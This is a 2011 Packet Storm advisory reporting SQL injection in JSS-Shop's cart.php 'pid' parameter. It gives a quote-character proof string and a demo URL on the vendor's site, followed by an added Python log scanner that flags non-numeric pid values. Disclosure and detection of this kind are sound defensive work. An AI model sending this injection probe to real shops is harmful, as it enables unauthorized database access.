JSS-Shop SQL Injection

2011-08-22T00:00:00
ID PACKETSTORM:104309
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-22T00:00:00

Description

`# Exploit Title: JSS-Shop (E-Commerce System) SQL Injection  
# Date: 2011  
# Author: Eyup CELIK  
# Software Link: http://www.turnkeycentral.com  
# Version: All versions  
# Tested on: All versions are vulnerable  
  
ISSUE  
  
SQL injection is possible through the pid parameter of cart.php  
  
Example  
cart.php?pid=<SQL Injection Code>&todo=add  
  
Exploit:  
cart.php?pid='1&todo=add  
  
Demo:  
http://www.justsimplescripts.com/shop/cart.php?pid=%271&todo=add  
  
  
Thanks,  
  
  
Eyup CELIK  
Information Technologies Security Specialist  
http://www.eyupcelik.com.tr  
`
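
For defenders reviewing web server logs for the request pattern above, the following added example (not part of the original advisory or of JSS-Shop) flags `cart.php` requests whose `pid` value is not a plain integer after URL decoding. The log lines are constructed, and the assumption that product IDs are integers of up to 10 digits is mine, not the advisory's.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; client addresses are documentation-range placeholders.
SAMPLE_LOG = '''\
192.0.2.10 - - [22/Aug/2011:10:00:01 +0000] "GET /shop/cart.php?pid=17&todo=add HTTP/1.1" 200 5120
192.0.2.44 - - [22/Aug/2011:10:00:07 +0000] "GET /shop/cart.php?pid=%271&todo=add HTTP/1.1" 200 312
192.0.2.10 - - [22/Aug/2011:10:00:09 +0000] "GET /shop/index.php?pid=abc HTTP/1.1" 200 4096
192.0.2.51 - - [22/Aug/2011:10:00:15 +0000] "GET /shop/cart.php?todo=add&pid=12abc HTTP/1.1" 200 298
192.0.2.10 - - [22/Aug/2011:10:00:20 +0000] "GET /shop/cart.php?todo=view HTTP/1.1" 200 2048
'''

# Client address and request target from a common/combined log format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate product id is 1-10 decimal digits and nothing else.
VALID_PID = re.compile(r'\A[0-9]{1,10}\Z')


def is_valid_pid(value):
    """Allow-list check: True only for a plain decimal integer."""
    return bool(VALID_PID.match(value))


def suspicious_cart_requests(log_text):
    """Return (client, decoded pid) for cart.php requests whose pid is not an integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith('/cart.php'):
            continue
        # parse_qs percent-decodes values, so %27 is compared as a literal quote.
        for pid in parse_qs(url.query, keep_blank_values=True).get('pid', []):
            if not is_valid_pid(pid):
                hits.append((client, pid))
    return hits


if __name__ == '__main__':
    for client, pid in suspicious_cart_requests(SAMPLE_LOG):
        print(f'{client} sent non-numeric pid: {pid!r}')
```

The same allow-list check belongs in the application before `pid` reaches the database, alongside parameterized queries, which are the actual fix for this class of flaw.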